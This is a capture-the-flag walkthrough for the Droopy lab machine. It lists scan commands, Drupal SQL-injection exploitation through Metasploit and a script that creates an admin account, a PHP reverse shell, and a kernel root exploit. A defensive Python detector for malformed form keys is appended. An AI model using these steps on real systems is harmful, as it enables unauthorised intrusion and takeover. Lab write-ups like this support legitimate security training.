Droopy:V0.2
Tools:
- netdiscover
- Nmap
- Wfuzz
- Nikto
- Metasploit
- droopescan
Vulnerabilities:
- Drupal HTTP Parameter Key/Value SQL Injection
- Linux Kernel 3.13.0 < 3.19 ‘overlayfs’ Local Root Shell
Use netdiscover to find the target's IP address:
netdiscover -i eth0 -r 192.168.41.0/24
192.168.41.155 is the target.
Then run nmap to detect open ports and running services on the target machine.
nmap -sV -v -O -A -T5 192.168.41.155 -p-
Only port 80 is open.
Use nikto to scan:
nikto -h 192.168.41.155
No useful info comes out.
still same thing.
Check http://192.168.41.155
The target uses Drupal.
Use Metasploit
In msfconsole, search drupal and find an interesting exploit: exploit/multi/http/drupal_drupageddon
Get meterpreter, then run the command shell to get a shell.
use python -c 'import pty; pty.spawn("/bin/bash")'
get bash
user is www-data, next try to get root
uname -a
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
the kernel is 3.13.0
searchsploit 3.13.0
upload the exploit, compile and run it, get the root:
Another way
use droopescan to scan
droopescan scan drupal -u http://192.168.41.155/ -t 8
now I know the version is 7.30
searchsploit drupal
find the 34992.txt exploit works.
./34992.py -t http://192.168.41.155 -u test -p test
This exploit creates an admin account test/test. Then, in Modules, make sure the PHP filter is selected.
Also, in People -> Permissions, check Use the PHP code text format.
In Configuration -> Content authoring -> Text formats, the administrator box needs to be checked.
Then create new content (copy and paste reverse shell PHP code) and use PHP code as the format, save it, then netcat will get the shell.
Then use same method in the first part of this post to get the root.
DONE
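Both routes above rely on the Drupal HTTP parameter key/value SQL injection, which arrives in the bracketed key of a form field rather than in its value. The following detection sketch is an added example, not part of the original post or of any tool used in it: it flags form-encoded requests whose parameter names break the normal key grammar. The allow-list regex, the function names and the sample requests (with a placeholder where an injected statement would sit) are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Field names a Drupal 7 form normally submits: a plain name followed by
# zero or more [subscript] parts made of letters, digits, "_" or "-".
# (This allow-list is an assumption for the example; extend it per site.)
NORMAL_KEY = re.compile(r"^[\w\-]+(\[[\w\-]*\])*$", re.ASCII)


def odd_keys(encoded):
    """Return the decoded parameter names that break the normal key grammar."""
    pairs = parse_qsl(encoded, keep_blank_values=True)
    return [key for key, _ in pairs if not NORMAL_KEY.match(key)]


def scan(requests):
    """requests: iterable of (client, method, url, body) tuples.
    Returns (client, path, offending_key) for each suspicious key found
    in the query string or in a form-encoded POST body."""
    alerts = []
    for client, method, url, body in requests:
        parts = urlsplit(url)
        sources = [parts.query]
        if method == "POST":
            sources.append(body)
        for src in sources:
            for key in odd_keys(src):
                alerts.append((client, parts.path, key))
    return alerts


# Constructed sample traffic, not captured from the target in this post.
SAMPLE = [
    ("192.168.41.10", "GET", "/?q=user/login", ""),
    ("192.168.41.10", "POST", "/?q=node&destination=node",
     "name=alice&pass=secret&form_id=user_login_block&op=Log+in"),
    ("192.168.41.20", "POST", "/?q=node&destination=node",
     "name%5B0%20%3BSQL_PLACEHOLDER%3B%23%20%5D=x&name%5B0%5D=y"
     "&pass=z&form_id=user_login_block&op=Log+in"),
    ("192.168.41.10", "POST", "/node/add/page",
     "title=Hi&body%5Bund%5D%5B0%5D%5Bvalue%5D=text&form_id=page_node_form"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

Nested Drupal field names such as body[und][0][value] pass the check; only keys carrying spaces, semicolons or comment markers inside the brackets are reported.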